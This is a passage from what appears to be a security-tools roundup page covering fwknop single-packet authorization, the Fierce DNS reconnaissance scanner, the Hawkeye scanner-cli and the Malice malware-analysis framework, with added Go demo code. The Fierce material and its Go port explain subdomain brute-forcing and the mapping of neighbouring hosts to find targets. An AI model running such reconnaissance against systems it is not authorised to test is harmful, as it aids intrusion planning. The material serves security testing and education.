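	"strings"
	"time"
)

var EncKey, HmacKey = bytes.Repeat([]byte{0x11}, 32), bytes.Repeat([]byte{0x22}, 32) // constructed demo keys (access.conf in fwknop)

const MaxAge = 120 * time.Second // packet-age limit; value assumed for the demo

// Verifier holds the server-side policy plus the replay cache of packet digests.
type Verifier struct {
	EncKey, HmacKey []byte
	OpenPorts       map[string]bool   // e.g. "tcp/22"
	seen            map[[32]byte]bool // SHA-256 digests of authenticated packets
}

// BuildSPA is the client side: AES-256-CBC under a fresh IV, then HMAC-SHA256 over
// IV||ciphertext appended to the packet (encrypt-then-authenticate). The message
// layout "unixtime:allow_ip:proto/port" is assumed here, not fwknop's real format.
func BuildSPA(encKey, hmacKey []byte, msg string) ([]byte, error) {
	block, err := aes.NewCipher(encKey)
	if err != nil {
		return nil, err
	}
	iv := make([]byte, aes.BlockSize)
	if _, err := rand.Read(iv); err != nil {
		return nil, err
	}
	pad := aes.BlockSize - len(msg)%aes.BlockSize // PKCS#7
	pt := append([]byte(msg), bytes.Repeat([]byte{byte(pad)}, pad)...)
	ct := make([]byte, len(pt))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(ct, pt)
	body := append(iv, ct...)
	mac := hmac.New(sha256.New, hmacKey)
	mac.Write(body)
	return mac.Sum(body), nil // Sum appends the 32-byte tag to body
}

// Verify checks in the order the feature list describes: HMAC first (unauthenticated
// bytes never reach the decryptor), then the replay digest, then decryption and the
// age / port policy. The access it returns is for the IP carried inside the packet.
func (v *Verifier) Verify(pkt []byte, now time.Time) (string, error) {
	n := len(pkt) - sha256.Size // length of IV||ciphertext
	if n < 2*aes.BlockSize || n%aes.BlockSize != 0 {
		return "", fmt.Errorf("bad packet length")
	}
	body, tag := pkt[:n], pkt[n:]
	mac := hmac.New(sha256.New, v.HmacKey)
	mac.Write(body)
	if !hmac.Equal(mac.Sum(nil), tag) { // constant-time comparison
		return "", fmt.Errorf("HMAC mismatch: dropped before decryption")
	}
	if v.seen == nil {
		v.seen = map[[32]byte]bool{}
	}
	digest := sha256.Sum256(pkt)
	if v.seen[digest] {
		return "", fmt.Errorf("replay: digest already seen")
	}
	v.seen[digest] = true
	block, err := aes.NewCipher(v.EncKey)
	if err != nil {
		return "", err
	}
	pt := make([]byte, n-aes.BlockSize)
	cipher.NewCBCDecrypter(block, body[:aes.BlockSize]).CryptBlocks(pt, body[aes.BlockSize:])
	var fields []string
	if pad := int(pt[len(pt)-1]); pad >= 1 && pad <= aes.BlockSize { // strip PKCS#7
		fields = strings.Split(string(pt[:len(pt)-pad]), ":")
	}
	if len(fields) != 3 {
		return "", fmt.Errorf("bad padding or malformed SPA message")
	}
	ts, err := strconv.ParseInt(fields[0], 10, 64)
	if age := now.Sub(time.Unix(ts, 0)); err != nil || age > MaxAge || age < -MaxAge {
		return "", fmt.Errorf("bad or stale timestamp %q", fields[0])
	}
	if !v.OpenPorts[fields[2]] {
		return "", fmt.Errorf("access to %s not permitted", fields[2])
	}
	// Access goes to fields[1], the address encrypted inside the packet, so an inline device that re-sends it from its own IP gains nothing.
	return fmt.Sprintf("ACCEPT %s %s", fields[1], fields[2]), nil
}

func main() {
	v := &Verifier{EncKey: EncKey, HmacKey: HmacKey, OpenPorts: map[string]bool{"tcp/22": true}}
	pkt, _ := BuildSPA(EncKey, HmacKey, fmt.Sprintf("%d:203.0.113.5:tcp/22", time.Now().Unix()))
	fmt.Println(v.Verify(pkt, time.Now())) // first delivery is accepted, a second delivery of pkt would be a replay
}
```

Deliver the same packet twice and the second copy is refused on its digest; flip one ciphertext byte and the HMAC check rejects it before any decryption happens, which is the point of the encrypt-then-authenticate ordering. A real fwknopd would not decode this packet, since the actual SPA layout differs; the ordering of the checks is what carries over.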

Link: http://www.kitploit.com/2019/02/fwknop-single-packet-authorization-port.html

Fierce – Semi-Lightweight Scanner That Helps Locate Non-Contiguous IP Space And Hostnames Against Specified Domains

Fierce is a semi-lightweight scanner that helps locate non-contiguous IP space and hostnames against specified domains. It's really meant as a precursor to nmap, unicornscan, nessus, nikto, etc., since all of those require that you already know what IP space you are looking for.

This does not perform exploitation and does not scan the whole internet indiscriminately. It is meant specifically to locate likely targets both inside and outside a corporate network.

Because it uses DNS primarily, you will often find mis-configured networks that leak internal address space. That's especially useful in targeted malware.

Options:

-connect      Attempt to make http connections to any non RFC1918 (public) addresses. This will output the return headers but be warned, this could take a long time against a company with many targets, depending on network/machine lag. I wouldn't recommend doing this unless it's a small company or you have a lot of free time on your hands (could take hours-days). Inside the file specified, the text "Host:\n" will be replaced by the host specified.
              Usage: perl fierce.pl -dns example.com -connect headers.txt
-delay        The number of seconds to wait between lookups.
-dns          The domain you would like scanned.
-dnsfile      Use DNS servers provided by a file (one per line) for reverse lookups (brute force).
-dnsserver    Use a particular DNS server for reverse lookups (probably should be the DNS server of the target). Fierce uses your DNS server for the initial SOA query and then uses the target's DNS server for all additional queries by default.
-file         A file you would like the output to be logged to.
-fulloutput   When combined with -connect this will output everything the webserver sends back, not just the HTTP headers.
-help         This screen.
-nopattern    Don't use a search pattern when looking for nearby hosts. Instead dump everything. This is really noisy but is useful for finding other domains that spammers might be using. It will also give you lots of false positives, especially on large domains.
-range        Scan an internal IP range (must be combined with -dnsserver). Note that this does not support a pattern and will simply output anything it finds.
              Usage: perl fierce.pl -range 111.222.333.0-255 -dnsserver ns1.example.co
-search       Search list. When fierce attempts to traverse up and down ipspace it may encounter other servers within other domains that may belong to the same company. If you supply a comma delimited list to fierce it will report anything found. This is especially useful if the corporate servers are named differently from the public facing website.
              Usage: perl fierce.pl -dns examplecompany.com -search corpcompany,blahcompany
              Note that using search could also greatly expand the number of hosts found, as it will continue to traverse once it locates servers that you specified in your search list. The more the better.
-suppress     Suppress all TTY output (when combined with -file).
-tcptimeout   Specify a different timeout (default 10 seconds). You may want to increase this if the DNS server you are querying is slow or has a lot of network lag.
-threads      Specify how many threads to use while scanning (default is single threaded).
-traverse     Specify a number of IPs above and below whatever IP you have found to look for nearby IPs. Default is 5 above and below. Traverse will not move into other C blocks.
-version      Output the version number.
-wide         Scan the entire class C after finding any matching hostnames in that class C. This generates a lot more traffic but can uncover a lot more information.
-wordlist     Use a separate wordlist (one word per line).
              Usage: perl fierce.pl -dns examplecompany.com -wordlist dictionary.txt

fierce Usage Example

root@kali:~# fierce -dns example.com
DNS Servers for example.com:
        b.iana-servers.net
        a.iana-servers.net

Trying zone transfer first...
        Testing b.iana-servers.net
                Request timed out or transfer not allowed.
        Testing a.iana-servers.net
                Request timed out or transfer not allowed.

Unsuccessful in zone transfer (it was worth a shot)
Okay, trying the good old fashioned way... brute force

Checking for wildcard DNS...
Nope. Good.
Now performing 2280 test(s)...

Download Fierce-Domain-Scanner
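Fierce's sequence after the zone-transfer attempt (check for wildcard DNS, brute force the wordlist, walk the neighbouring IPs with reverse lookups and keep what belongs to the target) is easy to get subtly wrong, especially the wildcard check and the /24 boundary for -traverse. The Go program below is an added example written for this page, not Fierce's own Perl. The zone data is constructed and served from memory through a small Resolver interface so that it runs offline; the AXFR step and the -wide, -connect and -nopattern options are not modelled. In real use you would back the interface with net.DefaultResolver pointed at the target's own name servers, as -dnsserver does.

```go
package main

import (
	"fmt"
	"math/rand"
	"net"
	"strings"
)

// Resolver abstracts the two DNS queries the logic needs, so it can run against
// the constructed in-memory zone below or a real resolver in practice.
type Resolver interface {
	LookupHost(name string) []string // A records for name
	LookupAddr(ip string) []string   // PTR names for ip
}

// fakeZone is constructed sample data for the demo, not real DNS.
type fakeZone struct {
	forward  map[string][]string
	reverse  map[string][]string
	wildcard string // if set, every unknown name resolves here (wildcard DNS)
}

func (z fakeZone) LookupHost(name string) []string {
	if a, ok := z.forward[name]; ok {
		return a
	}
	if z.wildcard != "" {
		return []string{z.wildcard}
	}
	return nil
}

func (z fakeZone) LookupAddr(ip string) []string { return z.reverse[ip] }

// HasWildcard is the "Checking for wildcard DNS" step: a random label that cannot
// be in any wordlist must not resolve, otherwise every brute-force guess "hits".
func HasWildcard(r Resolver, domain string) bool {
	return len(r.LookupHost(fmt.Sprintf("%x.%s", rand.Uint64(), domain))) > 0
}

// Traverse returns the n addresses above and below ip without leaving its /24
// ("Traverse will not move into other C blocks"); this demo also skips .0 and .255.
func Traverse(ip string, n int) []string {
	p := net.ParseIP(ip).To4()
	if p == nil {
		return nil
	}
	var out []string
	for d := -n; d <= n; d++ {
		if last := int(p[3]) + d; d != 0 && last >= 1 && last <= 254 {
			out = append(out, fmt.Sprintf("%d.%d.%d.%d", p[0], p[1], p[2], last))
		}
	}
	return out
}

// Scan refuses wildcard zones, brute forces words under domain, then reverse-
// resolves the neighbours of every hit and keeps names inside domain or matching
// a -search term. It returns hostname -> IP.
func Scan(r Resolver, domain string, words, search []string, n int) (map[string]string, error) {
	if HasWildcard(r, domain) {
		return nil, fmt.Errorf("%s has wildcard DNS; brute force results would be meaningless", domain)
	}
	found := map[string]string{}
	var seeds []string
	for _, w := range words {
		name := w + "." + domain
		for _, ip := range r.LookupHost(name) {
			found[name] = ip
			seeds = append(seeds, ip)
		}
	}
	for _, ip := range seeds {
		for _, near := range Traverse(ip, n) {
			for _, ptr := range r.LookupAddr(near) {
				ptr = strings.TrimSuffix(ptr, ".")
				keep := strings.HasSuffix(ptr, "."+domain)
				for _, term := range search {
					keep = keep || strings.Contains(ptr, term)
				}
				if keep {
					found[ptr] = near
				}
			}
		}
	}
	return found, nil
}

func main() {
	zone := fakeZone{
		forward: map[string][]string{"www.example.com": {"198.51.100.10"}},
		reverse: map[string][]string{"198.51.100.11": {"vpn.example.com."}, "198.51.100.15": {"unrelated.other.org."}},
	}
	fmt.Println(Scan(zone, "example.com", []string{"www", "mail"}, nil, 5)) // vpn.example.com is found via its neighbour; the unrelated PTR is dropped
}
```

The wildcard check is the part worth keeping even if you rewrite the rest: against a zone that answers every name, a 2280-word run reports 2280 "hosts" and none of them mean anything.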

Link: http://feedproxy.google.com/~r/PentestTools/~3/X8Fc7tY8OFI/fierce-semi-lightweight-scanner-that.html

Scanner-Cli – A Project Security/Vulnerability/Risk Scanning Tool

The Hawkeye scanner-cli is a project security, vulnerability and general risk highlighting tool. It is meant to be integrated into your pre-commit hooks and your pipelines.

Running and configuring the scanner

The Hawkeye scanner-cli assumes that your directory structure is such that it keeps the toolchain's files on top level. Roughly, this is what it boils down to:

- Node.js projects have a package.json on top level
- Ruby projects will have a Gemfile on top level
- Python projects will have a requirements.txt on top level
- PHP projects will have a composer.lock on top level
- Java projects will have a build (gradle) or target (maven) folder, and include .java and .jar files

This is not exhaustive, as sometimes tools require further files to exist. To understand how the modules decide whether they can handle a project, please check the How it works section and the modules folder.

Docker (recommended)

The docker image is hands-down the easiest way to run the scanner. Please note that your project root (e.g. $PWD) needs to be mounted to /target.

docker run --rm -v $PWD:/target hawkeyesec/scanner-cli

The docker build is also the recommended way to run the scanner in your CI pipelines. This is an example of running Hawkeye against one of your projects in GoCD:
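The module-selection rule above (one toolchain file at the top level, and for Java a build/ or target/ directory plus .java or .jar files below it) decides whether a scan does anything at all, so it is worth being able to check it before wiring the scanner into a pipeline. The Go program below is an added example written for this page, not part of scanner-cli; the marker table is taken from the list above, and the error text and the "no module" message are my own.

```go
package main

import (
	"fmt"
	"io/fs"
	"os"
	"path/filepath"
	"sort"
	"strings"
)

// topLevelMarkers mirrors the layout the scanner assumes: one toolchain file at
// the project root selects a module family.
var topLevelMarkers = map[string]string{
	"package.json":     "node",
	"Gemfile":          "ruby",
	"requirements.txt": "python",
	"composer.lock":    "php",
}

// DetectModules returns the sorted module families that would claim the project
// at root. Java needs a build/ (gradle) or target/ (maven) directory at the top
// level and at least one .java or .jar file somewhere below root.
func DetectModules(root string) ([]string, error) {
	if fi, err := os.Stat(root); err != nil || !fi.IsDir() {
		return nil, fmt.Errorf("%s is not a directory; mount the project root (e.g. -v $PWD:/target)", root)
	}
	set := map[string]bool{}
	for file, mod := range topLevelMarkers {
		if _, err := os.Stat(filepath.Join(root, file)); err == nil {
			set[mod] = true
		}
	}
	for _, dir := range []string{"build", "target"} {
		if fi, err := os.Stat(filepath.Join(root, dir)); err == nil && fi.IsDir() && hasJavaArtifacts(root) {
			set["java"] = true
		}
	}
	var mods []string
	for m := range set {
		mods = append(mods, m)
	}
	sort.Strings(mods)
	return mods, nil
}

// hasJavaArtifacts walks the tree looking for .java sources or .jar archives.
func hasJavaArtifacts(root string) bool {
	found := false
	filepath.WalkDir(root, func(p string, d fs.DirEntry, err error) error {
		if err == nil && !d.IsDir() && (strings.HasSuffix(p, ".java") || strings.HasSuffix(p, ".jar")) {
			found = true
		}
		return nil
	})
	return found
}

func main() {
	root := "."
	if len(os.Args) > 1 {
		root = os.Args[1]
	}
	mods, err := DetectModules(root)
	if err != nil {
		fmt.Println(err)
		return
	}
	if len(mods) == 0 {
		fmt.Println("no module would handle this layout: is the toolchain file at the top level?")
	}
	fmt.Println(mods)
}
```

Point it at the directory you intend to mount as /target. An empty result usually means the toolchain file lives one level down (a requirements.txt under src/, say), in which case the scanner runs, finds nothing to do, and the pipeline stays green for the wrong reason.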

Link: http://feedproxy.google.com/~r/PentestTools/~3/JoL8_BBnrhQ/scanner-cli-project-securityvulnerabili.html

Malice – VirusTotal Wanna Be (Now With 100% More Hipster)

Malice's mission is to be a free open source version of VirusTotal that anyone can use at any scale, from an independent researcher to a Fortune 500 company.

Try It Out

DEMO: demo.malice.io
username: malice
password: ecilam

Requirements

Hardware
- ~16GB disk space
- ~4GB RAM

Software
- Docker

Getting Started (OSX)

Install

$ brew install maliceio/tap/malice

Usage: malice [OPTIONS] COMMAND [arg...]

Open Source Malware Analysis Framework

Version: 0.3.11
Author: blacktop

Options:
  --debug, -D    Enable debug mode [$MALICE_DEBUG]
  --help, -h     show help
  --version, -v  print the version

Commands:
  scan     Scan a file
  watch    Watch a folder
  lookup   Look up a file hash
  elk      Start an ELK docker container
  plugin   List, Install or Remove Plugins
  help     Shows a list of commands or help for one command

Run 'malice COMMAND --help' for more information on a command.

Scan some malware

$ malice scan evil.malware

NOTE: On the first run malice will download all of its default plugins, which can take a while to complete.

Malice will output the results as a markdown table that can be piped or copied into a results.md that will look great on Github (see here).

Start Malice's Web UI

$ malice elk

You can open the Kibana UI and look at the scan results here: http://localhost (assuming you are using Docker for Mac)

Type in malice as the Index name or pattern and click Create. Now click on the Malice Tab and behold!!!

Getting Started (Docker in Docker)

Install/Update all Plugins

docker run --rm -v /var/run/docker.sock:/var/run/docker.sock malice/engine plugin update --all

Scan a file

docker run --rm -v /var/run/docker.sock:/var/run/docker.sock \
  -v `pwd`:/malice/samples \
  -e MALICE_VT_API=$MALICE_VT_API \
  malice/engine scan SAMPLE

Note that mounting /var/run/docker.sock hands the malice/engine container full control of the host's Docker daemon, which is root-equivalent on the host; run this on a dedicated analysis machine rather than a shared workstation, and keep the samples directory separate from anything you care about.

Documentation
- Documentation
- Plugins
- Examples
- Roadmap
- Contributing

Download Malice

Link: http://feedproxy.google.com/~r/PentestTools/~3/MYaRxSE3IIE/malice-virustotal-wanna-be-now-with-100.html